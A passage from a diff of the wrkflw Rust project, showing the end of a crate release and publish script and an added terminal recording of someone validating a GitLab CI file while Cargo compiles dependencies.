echo "❌ Error: Version type required (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
"publish")
|
||||
# publish command doesn't need version type
|
||||
;;
|
||||
"release")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required for release (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo "❌ Error: Unknown command '$COMMAND'"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
# Check if cargo-workspaces is installed
|
||||
if ! command -v cargo-workspaces &> /dev/null; then
|
||||
echo "❌ cargo-workspaces not found. Installing..."
|
||||
cargo install cargo-workspaces
|
||||
fi
|
||||
|
||||
# Check if we're logged in to crates.io (only for publish operations)
|
||||
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
|
||||
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
|
||||
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
|
||||
# Function to update versions
|
||||
update_versions() {
|
||||
local version_type=$1
|
||||
echo "🔄 Updating workspace versions ($version_type)..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Simulating version update"
|
||||
echo ""
|
||||
echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
|
||||
echo "Would execute: cargo workspaces version $version_type"
|
||||
echo ""
|
||||
echo "This would update all crates and their internal dependencies."
|
||||
echo "✅ Version update simulation completed (no changes made)"
|
||||
else
|
||||
cargo workspaces version "$version_type"
|
||||
echo "✅ Versions updated successfully"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to test build
|
||||
test_build() {
|
||||
echo "🔨 Testing workspace build..."
|
||||
if cargo build --workspace; then
|
||||
echo "✅ Workspace builds successfully"
|
||||
else
|
||||
echo "❌ Build failed. Please fix errors before publishing."
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to publish crates
|
||||
publish_crates() {
|
||||
echo "📦 Publishing crates to crates.io..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Testing publication"
|
||||
cargo workspaces publish --dry-run
|
||||
echo "✅ All crates passed dry-run tests!"
|
||||
echo ""
|
||||
echo "To actually publish, run:"
|
||||
echo " $0 publish"
|
||||
else
|
||||
cargo workspaces publish
|
||||
echo "🎉 All crates published successfully!"
|
||||
echo ""
|
||||
echo "Users can now install wrkflw with:"
|
||||
echo " cargo install wrkflw"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to show changelog info
|
||||
show_changelog_info() {
|
||||
echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
|
||||
}
|
||||
|
||||
# Execute commands based on the operation
|
||||
case "$COMMAND" in
|
||||
"version")
|
||||
update_versions "$VERSION_TYPE"
|
||||
show_changelog_info
|
||||
;;
|
||||
"publish")
|
||||
test_build
|
||||
publish_crates
|
||||
;;
|
||||
"release")
|
||||
echo "🚀 Starting release process..."
|
||||
echo ""
|
||||
|
||||
# Step 1: Update versions
|
||||
update_versions "$VERSION_TYPE"
|
||||
|
||||
# Step 2: Test build
|
||||
test_build
|
||||
|
||||
# Step 3: Show changelog info
|
||||
show_changelog_info
|
||||
|
||||
# Step 4: Publish (if not dry-run)
|
||||
if [[ "$DRY_RUN" != "--dry-run" ]]; then
|
||||
echo ""
|
||||
read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
|
||||
echo
|
||||
if [[ $REPLY =~ ^[Yy]$ ]]; then
|
||||
publish_crates
|
||||
else
|
||||
echo "⏸️ Publishing cancelled. To publish later, run:"
|
||||
echo " $0 publish"
|
||||
fi
|
||||
else
|
||||
echo ""
|
||||
publish_crates
|
||||
fi
|
||||
;;
|
||||
esac
|
||||
774
red.cast
Normal file
774
red.cast
Normal file
@@ -0,0 +1,774 @@
|
||||
{"version": 2, "width": 245, "height": 61, "timestamp": 1746300930, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
|
||||
[0.393681, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[0.394167, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[0.394183, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[0.395693, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[0.396236, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[K"]
|
||||
[0.396293, "o", "\u001b[?1h\u001b="]
|
||||
[0.396318, "o", "\u001b[?2004h"]
|
||||
[0.437911, "o", "\r\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[1.784697, "o", "c"]
|
||||
[1.885654, "o", "\bca"]
|
||||
[2.079234, "o", "t"]
|
||||
[2.252374, "o", " "]
|
||||
[2.858954, "o", "t"]
|
||||
[2.980971, "o", "e"]
|
||||
[3.172113, "o", "s"]
|
||||
[3.276278, "o", "t"]
|
||||
[3.976366, "o", "_"]
|
||||
[5.418211, "o", "g"]
|
||||
[5.804484, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[7.30486, "o", "\u0007"]
|
||||
[7.304922, "o", "\b\u001b[0m/\r\r\n"]
|
||||
[7.305065, "o", "\u001b[J\u001b[0madvanced.gitlab-ci.yml \u001b[Jbasic.gitlab-ci.yml \u001b[Jdocker.gitlab-ci.yml \u001b[Jincludes.gitlab-ci.yml \u001b[Jinvalid.gitlab-ci.yml \u001b[Jminimal.gitlab-ci.yml \u001b[Jservices.gitlab-ci.yml \u001b[Jworkflow.gitlab-ci.yml\u001b[J\u001b[A\u001b[0m\u001b[27m\u001b[24m\r\u001b[19Ccat test_gitlab_ci/\u001b[K"]
|
||||
[8.264729, "o", "m"]
|
||||
[8.4479, "o", "i"]
|
||||
[8.643085, "o", "nimal.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[9.529005, "o", "\b\u001b[0m \b"]
|
||||
[9.529291, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n\u001b[J"]
|
||||
[9.531431, "o", "\u001b]2;cat test_gitlab_ci/minimal.gitlab-ci.yml\u0007\u001b]1;cat\u0007"]
|
||||
[9.563469, "o", "# Minimal GitLab CI configuration\r\n\r\nimage: rust:latest\r\n\r\nbuild:\r\n script:\r\n - cargo build\r\n\r\ntest:\r\n script:\r\n - cargo test "]
|
||||
[9.563717, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[9.564397, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[9.564419, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[9.566692, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[9.568961, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[9.569081, "o", "\u001b[?1h\u001b="]
|
||||
[9.569181, "o", "\u001b[?2004h"]
|
||||
[11.969049, "o", "c"]
|
||||
[12.088692, "o", "\bca"]
|
||||
[12.375203, "o", "r"]
|
||||
[12.467428, "o", "g"]
|
||||
[12.549475, "o", "o"]
|
||||
[12.816019, "o", "r"]
|
||||
[13.230493, "o", "\b \b"]
|
||||
[13.400359, "o", " "]
|
||||
[13.600041, "o", "r"]
|
||||
[13.715537, "o", " "]
|
||||
[14.313772, "o", "v"]
|
||||
[14.503158, "o", "a"]
|
||||
[14.615728, "o", "l"]
|
||||
[14.836236, "o", "i"]
|
||||
[14.961289, "o", "d"]
|
||||
[15.051538, "o", "a"]
|
||||
[15.243561, "o", "t"]
|
||||
[15.350827, "o", "e"]
|
||||
[15.447092, "o", " "]
|
||||
[19.359227, "o", "\u001b[7mtest_gitlab_ci/minimal.gitlab-ci.yml\u001b[27m"]
|
||||
[20.437202, "o", "\u001b[36D\u001b[27mt\u001b[27me\u001b[27ms\u001b[27mt\u001b[27m_\u001b[27mg\u001b[27mi\u001b[27mt\u001b[27ml\u001b[27ma\u001b[27mb\u001b[27m_\u001b[27mc\u001b[27mi\u001b[27m/\u001b[27mm\u001b[27mi\u001b[27mn\u001b[27mi\u001b[27mm\u001b[27ma\u001b[27ml\u001b[27m.\u001b[27mg\u001b[27mi\u001b[27mt\u001b[27ml\u001b[27ma\u001b[27mb\u001b[27m-\u001b[27mc\u001b[27mi\u001b[27m.\u001b[27my\u001b[27mm\u001b[27ml"]
|
||||
[20.437676, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n"]
|
||||
[20.439716, "o", "\u001b]2;cargo r validate test_gitlab_ci/minimal.gitlab-ci.yml\u0007\u001b]1;cargo\u0007"]
|
||||
[20.763171, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m proc-macro2 v1.0.94\r\n\u001b[1m\u001b[32m Compiling\u001b[0m unicode-ident v1.0.18\r\n"]
|
||||
[20.763198, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m libc v0.2.171\r\n\u001b[1m\u001b[32m Compiling\u001b[0m autocfg v1.4.0\r\n\u001b[1m\u001b[32m Compiling\u001b[0m cfg-if v1.0.0\r\n"]
|
||||
[20.763207, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m memchr v2.7.4\r\n"]
|
||||
[20.763396, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m serde v1.0.219\r\n\u001b[1m\u001b[32m Compiling\u001b[0m smallvec v1.14.0\r\n\u001b[1m\u001b[32m Compiling\u001b[0m itoa v1.0.15\r\n\u001b[1m\u001b[32m Compiling\u001b[0m bitflags v2.9.0\r\n\u001b[1m\u001b[32m Compiling\u001b[0m parking_lot_core v0.9.10\r\n\u001b[1m\u001b[32m Compiling\u001b[0m scopeguard v1.2.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 0/270: scopeguard, autocfg, libc(build.rs), serde(build.rs), unicode-ident, memchr, cfg-if, smallvec, proc-macro2(build.rs), itoa, bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.863836, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m pin-project-lite v0.2.16\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 1/270: scopeguard, autocfg, libc(build.rs), serde(build.rs), unicode-ident, memchr, pin-project-lite, smallvec, proc-macro2(build.rs), itoa, bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.888886, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m hashbrown v0.15.2\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 2/270: autocfg, libc(build.rs), serde(build.rs), hashbrown, unicode-ident, memchr, pin-project-lite, smallvec, proc-macro2(build.rs), itoa, bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.889407, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m equivalent v1.0.2\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 3/270: equivalent, autocfg, libc(build.rs), serde(build.rs), hashbrown, memchr, pin-project-lite, smallvec, proc-macro2(build.rs), itoa, bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.901807, "o", "\u001b[K"]
|
||||
[20.901967, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m stable_deref_trait v1.2.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 4/270: equivalent, autocfg, libc(build.rs), serde(build.rs), hashbrown, stable_deref_trait, memchr, pin-project-lite, smallvec, proc-macro2(build.rs), bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.916803, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m once_cell v1.21.2\r\n"]
|
||||
[20.916855, "o", "\u001b[1m\u001b[36m Building\u001b[0m [ ] 5/270: equivalent, autocfg, libc(build.rs), serde(build.rs), hashbrown, stable_deref_trait, memchr, once_cell, smallvec, proc-macro2(build.rs), bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.954688, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m core-foundation-sys v0.8.7\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 6/270: equivalent, autocfg, core-foundation-sys, libc(build.rs), serde(build.rs), hashbrown, stable_deref_trait, memchr, once_cell, proc-macro2(build.rs), bitflags, parking_lot_core(build.rs) \r"]
|
||||
[20.960325, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bytes v1.10.1\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 7/270: autocfg, core-foundation-sys, hashbrown, once_cell, parking_lot_core(build.rs), equivalent, bytes, libc(build.rs), serde(build.rs), stable_deref_trait, memchr, proc-macro2(build.rs) \r"]
|
||||
[20.961287, "o", "\u001b[1m\u001b[36m Building\u001b[0m [ ] 8/270: autocfg, core-foundation-sys, hashbrown, once_cell, equivalent, bytes, libc(build.rs), serde(build.rs), stable_deref_trait, parking_lot_core(build), memchr, proc-macro2(build.rs) \r"]
|
||||
[20.964842, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-sink v0.3.31\r\n\u001b[1m\u001b[32m Compiling\u001b[0m futures-core v0.3.31\r\n\u001b[1m\u001b[36m Building\u001b[0m [ ] 10/270: autocfg, core-foundation-sys, hashbrown, once_cell, bytes, futures-core, libc(build.rs), serde(build.rs), parking_lot_core(build), memchr, proc-macro2(build.rs), futures-sink \r"]
|
||||
[20.979236, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 11/270: autocfg, core-foundation-sys, hashbrown, once_cell, bytes, futures-core, proc-macro2(build), libc(build.rs), serde(build.rs), parking_lot_core(build), memchr, futures-sink \r"]
|
||||
[20.981339, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 12/270: autocfg, core-foundation-sys, hashbrown, once_cell, bytes, futures-core, proc-macro2(build), libc(build.rs), serde(build), parking_lot_core(build), memchr, futures-sink \r"]
|
||||
[21.033814, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m ryu v1.0.20\r\n"]
|
||||
[21.033863, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 13/270: autocfg, core-foundation-sys, ryu, hashbrown, bytes, futures-core, proc-macro2(build), libc(build.rs), serde(build), parking_lot_core(build), memchr, futures-sink \r"]
|
||||
[21.034272, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 14/270: autocfg, core-foundation-sys, ryu, hashbrown, bytes, futures-core, proc-macro2(build), libc(build), serde(build), parking_lot_core(build), memchr, futures-sink \r"]
|
||||
[21.04051, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m serde_json v1.0.140\r\n"]
|
||||
[21.040547, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 15/270: autocfg, core-foundation-sys, ryu, hashbrown, bytes, futures-core, serde_json(build.rs), proc-macro2(build), libc(build), serde(build), parking_lot_core(build), memchr \r"]
|
||||
[21.05181, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-channel v0.3.31\r\n"]
|
||||
[21.052003, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 16/270: futures-channel, autocfg, core-foundation-sys, ryu, hashbrown, bytes, serde_json(build.rs), proc-macro2(build), libc(build), serde(build), parking_lot_core(build), memchr "]
|
||||
[21.052164, "o", "\r"]
|
||||
[21.063105, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m lock_api v0.4.12\r\n"]
|
||||
[21.063156, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 17/270: futures-channel, core-foundation-sys, ryu, hashbrown, bytes, lock_api(build.rs), serde_json(build.rs), proc-macro2(build), libc(build), serde(build), parking_lot_core(build), memchr \r"]
|
||||
[21.07565, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m slab v0.4.9\r\n"]
|
||||
[21.075716, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 18/270: futures-channel, ryu, hashbrown, slab(build.rs), bytes, lock_api(build.rs), serde_json(build.rs), proc-macro2(build), libc(build), serde(build), parking_lot_core(build), memchr \r"]
|
||||
[21.108286, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-traits v0.2.19\r\n"]
|
||||
[21.10843, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 19/270: futures-channel, ryu, hashbrown, slab(build.rs), bytes, lock_api(build.rs), serde_json(build.rs), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), parking_lot_core(build) \r"]
|
||||
[21.135823, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m litemap v0.7.5\r\n"]
|
||||
[21.136189, "o", "\u001b[1m\u001b[36m Building\u001b[0m [> ] 20/270: futures-channel, hashbrown, slab(build.rs), bytes, lock_api(build.rs), serde_json(build.rs), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), parking_lot_core(build), lit...\r"]
|
||||
[21.138845, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 21/270: futures-channel, hashbrown, slab(build.rs), bytes, lock_api(build.rs), serde_json(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), parking_lot_core(build), litemap \r\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_locid_transform_data v1.5.1\r\n\u001b[1m\u001b[36m Building\u001b[0m [=> ] 22/270: futures-channel, hashbrown, slab(build.rs), bytes, lock_api(build.rs), serde_json(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), icu_locid_transform_data(build....\r"]
|
||||
[21.161233, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m pin-utils v0.1.0\r\n"]
|
||||
[21.161271, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 23/270: pin-utils, hashbrown, slab(build.rs), bytes, lock_api(build.rs), serde_json(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), icu_locid_transform_data(build.rs), l...\r"]
|
||||
[21.161905, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 24/270: pin-utils, hashbrown, slab(build.rs), bytes, serde_json(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), icu_locid_transform_data(build.rs), litemap, lock_api(build)\r"]
|
||||
[21.171062, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 25/270: pin-utils, hashbrown, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), icu_locid_transform_data(build.rs), litemap, lock_api(build) \r"]
|
||||
[21.18027, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m rustix v1.0.3\r\n"]
|
||||
[21.180299, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 26/270: pin-utils, rustix(build.rs), bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), icu_locid_transform_data(build.rs), litemap, lock_api...\r"]
|
||||
[21.196422, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m writeable v0.5.5\r\n"]
|
||||
[21.19645, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 27/270: rustix(build.rs), writeable, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), num-traits(build.rs), icu_locid_transform_data(build.rs), litemap, lock_api...\r"]
|
||||
[21.209074, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-task v0.3.31\r\n\u001b[1m\u001b[36m Building\u001b[0m [=> ] 28/270: rustix(build.rs), writeable, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), icu_locid_transform_data(build.rs), litemap, lock_api(build), futures-task \r"]
|
||||
[21.230428, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-io v0.3.31\r\n"]
|
||||
[21.23048, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 29/270: rustix(build.rs), writeable, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), futures-io, litemap, lock_api(build), futures-task \r"]
|
||||
[21.24605, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 30/270: rustix(build.rs), writeable, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), futures-io, lock_api(build), icu_locid_transform_data(build), futures-task \r"]
|
||||
[21.27647, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=> ] 31/270: num-traits(build), rustix(build.rs), writeable, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), futures-io, lock_api(build), icu_locid_transform_data(bu...\r"]
|
||||
[21.294729, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m thiserror v1.0.69\r\n"]
|
||||
[21.294924, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 32/270: num-traits(build), rustix(build.rs), writeable, bytes, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), lock_api(build), icu_locid_transform_data(build), thiser...\r"]
|
||||
[21.312333, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_properties_data v1.5.1\r\n"]
|
||||
[21.312427, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 33/270: num-traits(build), rustix(build.rs), writeable, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), icu_properties_data(build.rs), lock_api(build), icu_locid_trans...\r"]
|
||||
[21.314227, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 34/270: num-traits(build), rustix(build), writeable, serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), icu_properties_data(build.rs), lock_api(build), icu_locid_transfor...\r"]
|
||||
[21.33527, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m getrandom v0.3.2\r\n"]
|
||||
[21.335367, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 35/270: num-traits(build), rustix(build), getrandom(build.rs), serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), icu_properties_data(build.rs), lock_api(build), icu_loci...\r"]
|
||||
[21.382291, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 36/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build.rs), serde_json(build), slab(build), proc-macro2(build), libc(build), serde(build), lock_api(build), icu_locid_t...\r"]
|
||||
[21.409263, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 37/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build.rs), proc-macro2, serde_json(build), slab(build), libc(build), serde(build), lock_api(build), icu_locid_transfor...\r"]
|
||||
[21.409608, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 38/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build.rs), proc-macro2, serde_json(build), slab(build), thiserror(build), libc(build), serde(build), lock_api(build), ...\r"]
|
||||
[21.452063, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 39/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), proc-macro2, serde_json(build), slab(build), thiserror(build), libc(build), serde(build), lock_api(build), icu...\r"]
|
||||
[21.640658, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m quote v1.0.40\r\n"]
|
||||
[21.640694, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 40/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), quote, proc-macro2, serde_json(build), slab(build), thiserror(build), libc(build), lock_api(build), icu_locid_...\r"]
|
||||
[21.686485, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_normalizer_data v1.5.1\r\n"]
|
||||
[21.686579, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==> ] 41/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), icu_normalizer_data(build.rs), quote, serde_json(build), slab(build), thiserror(build), libc(build), lock_api(...\r"]
|
||||
[21.759368, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m syn v2.0.100\r\n"]
|
||||
[21.759454, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 42/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, quote, serde_json(build), slab(build), thiserror(build), libc(build), lock_api(build), icu_locid_transfor...\r"]
|
||||
[21.764469, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m fnv v1.0.7\r\n"]
|
||||
[21.764538, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 43/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, serde_json(build), fnv, slab(build), thiserror(build), libc(build), lock_api(build), icu_locid_transform_...\r"]
|
||||
[21.796702, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m http v0.2.12\r\n"]
|
||||
[21.796791, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 44/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, serde_json(build), slab(build), thiserror(build), libc(build), http, lock_api(build), icu_locid_transform...\r"]
|
||||
[21.889367, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 45/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, serde_json(build), slab(build), thiserror(build), http, lock_api(build), libc, icu_locid_transform_data(b...\r"]
|
||||
[22.197788, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 46/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, slab(build), thiserror(build), http, lock_api(build), libc, icu_locid_transform_data(build), icu_normaliz...\r"]
|
||||
[22.324053, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m signal-hook-registry v1.4.2\r\n"]
|
||||
[22.324162, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 47/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, slab(build), thiserror(build), signal-hook-registry, lock_api(build), libc, icu_locid_transform_data(buil...\r"]
|
||||
[22.335479, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 48/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, parking_lot_core, slab(build), thiserror(build), signal-hook-registry, lock_api(build), icu_locid_transfo...\r"]
|
||||
[22.463262, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m errno v0.3.10\r\n"]
|
||||
[22.463317, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 49/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, slab(build), thiserror(build), signal-hook-registry, lock_api(build), icu_locid_transform_data(build), ic...\r"]
|
||||
[22.46546, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 50/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, lock_api, slab(build), thiserror(build), signal-hook-registry, icu_locid_transform_data(build), icu_norma...\r"]
|
||||
[22.513539, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m mio v1.0.3\r\n"]
|
||||
[22.51357, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===> ] 51/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, lock_api, slab(build), thiserror(build), icu_locid_transform_data(build), mio, icu_normalizer_data(build)...\r"]
|
||||
[22.519736, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m socket2 v0.5.8\r\n"]
|
||||
[22.519842, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 52/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, lock_api, slab(build), thiserror(build), icu_locid_transform_data(build), mio, icu_normalizer_data(build)...\r"]
|
||||
[22.556956, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m parking_lot v0.12.3\r\n"]
|
||||
[22.557057, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 53/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, slab(build), thiserror(build), parking_lot, icu_locid_transform_data(build), mio, icu_normalizer_data(bui...\r"]
|
||||
[22.712544, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 54/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, slab, thiserror(build), parking_lot, icu_locid_transform_data(build), mio, icu_normalizer_data(build), so...\r"]
|
||||
[22.747265, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tracing-core v0.1.33\r\n"]
|
||||
[22.747298, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 55/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, slab, thiserror(build), icu_locid_transform_data(build), mio, icu_normalizer_data(build), s...\r"]
|
||||
[22.747509, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m log v0.4.27\r\n"]
|
||||
[22.747596, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 56/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, log, slab, thiserror(build), icu_locid_transform_data(build), mio, icu_normalizer_data(build) \r"]
|
||||
[22.777478, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m unsafe-libyaml v0.2.11\r\n"]
|
||||
